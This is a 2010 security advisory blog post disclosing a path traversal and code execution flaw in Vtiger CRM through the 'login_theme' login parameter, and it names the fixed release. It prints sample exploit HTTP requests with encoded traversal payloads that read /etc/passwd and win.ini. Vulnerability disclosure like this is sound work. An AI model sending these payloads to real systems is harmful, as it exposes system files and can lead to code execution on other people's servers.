« Babylon Cross-Application Scripting | Main | Scanning for Client-Side JavaScript Vulnerabilities »

November 16, 2010

Vtiger CRM Path Traversal & Malicious Code Execution Vulnerabilities

Summary:

A Path Traversal vulnerability exists in Vtiger CRM release 5.1.0 (Linux) and 5.2.0RC (Windows), which allows a malicious user to view the contents of any file that resides on the machine on which Vtiger CRM is installed. In addition, when the malicious user can place his/her own PHP file on the same machine, this vulnerability can be used in order to execute the contents of that PHP file under the permissions used by the Vtiger CRM application.

Description:

the vulnerability exists in the parameter 'login_theme', which is passed as a part of the login request to the application, as can be seen below:

[Login, HTTP Request - Line Wrapped]

POST /vtigercrm/index.php HTTP/1.1
Content-Length: ...
Content-Type: application/x-www-form-urlencoded
Host: www.vuln.site
Connection: Keep-Alive

module=Users&action=Authenticate&return_module=Users&return_action=Login&
user_name=standarduser&user_password=user&login_theme=[MALICIOUS_PAYLOAD]&
login_language=en_us&Login.x=41&Login.y=20

[End of HTTP Request]

In order to exploit this vulnerability, a malicious user can manipulate the value of the 'login_theme' parameter, to a value such as:

[On Windows OS]

login_theme=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini%00  

[On Linux/Unix OS]

login_theme=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd%00

For example:

[Sample Exploit for Windows OS]

POST /vtigercrm/index.php HTTP/1.1
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Host: www.vuln.site

module=Users&action=Authenticate&return_module=Users&return_action=Login&
user_name=standarduser&user_password=user&
login_theme=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/
%2E%2E/%2E%2E/windows/win.ini%00&login_language=en_us&Login.x=41&Login.y=20

[End of Sample Exploit]

In addition to the above, if the malicious user has the ability to plant a PHP file of his/her choice, somewhere on the same file system as the Vtiger CRM installation, he/she can use this vulnerability to execute that PHP file, under the permissions of the Vtiger CRM process. 

Solution:

This issue was fixed in Vtiger CRM release 5.2.1

References:

Vtiger CRM 5.2.1 Release Notice

Posted by on November 16, 2010 in Info Bits, Research, Web Application Security |

| |

Comments

The comments to this entry are closed.

Follow us on Twitter

IBM Application Security Insider
IBM Application Security Insider

AppScan Free Trial


Try IBM Security AppScan software at no charge.

Search

Recent Posts

Archives

Categories

Pages

Become a Fan